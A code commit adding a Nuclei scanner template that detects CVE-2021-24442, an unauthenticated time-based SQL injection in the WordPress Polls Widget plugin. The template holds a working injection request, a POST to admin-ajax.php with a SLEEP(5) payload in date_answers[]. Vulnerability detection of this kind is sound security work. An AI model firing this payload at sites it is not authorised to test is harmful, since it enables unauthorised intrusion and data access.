Merge pull request #9130 from projectdiscovery/CVE-2021-24442

Create CVE-2021-24442.yaml

http/cves/2021/CVE-2021-24442.yaml

@@ -0,0 +1,48 @@
+id: CVE-2021-24442
+
+info:
+  name: Wordpress Polls Widget < 1.5.3 - SQL Injection
+  author: ritikchaddha
+  severity: critical
+  description: |
+    The Poll, Survey, Questionnaire and Voting system WordPress plugin before 1.5.3 did not sanitise, escape or validate the date_answers[] POST parameter before using it in a SQL statement when sending a Poll result, allowing unauthenticated users to perform SQL Injection attacks
+  remediation: Fixed in 1.5.3
+  reference:
+    - https://wpscan.com/vulnerability/7376666e-9b2a-4239-b11f-8544435b444a/
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24442
+    - https://wordpress.org/plugins/polls-widget/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2021-24442
+    cwe-id: CWE-89
+    epss-score: 0.00212
+    epss-percentile: 0.58237
+    cpe: cpe:2.3:a:wpdevart:poll\,_survey\,_questionnaire_and_voting_system:*:*:*:*:*:wordpress:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: wpdevart
+    product: poll\,_survey\,_questionnaire_and_voting_system
+    framework: wordpress
+    publicwww-query: "/wp-content/plugins/polls-widget/"
+  tags: wpscan,cve,cve2021,wp,wp-plugin,wpscan,wordpress,polls-widget,sqli
+
+http:
+  - raw:
+      - |
+        @timeout: 25s
+        POST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        X-Forwarded-For: {{randstr}}
+
+        question_id=1&poll_answer_securety=8df73ed4ee&date_answers%5B0%5D=SLEEP(5)
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=5'
+          - 'status_code == 200'
+          - 'contains_all(body, "{\"answer_name", "vote\":")'
+        condition: and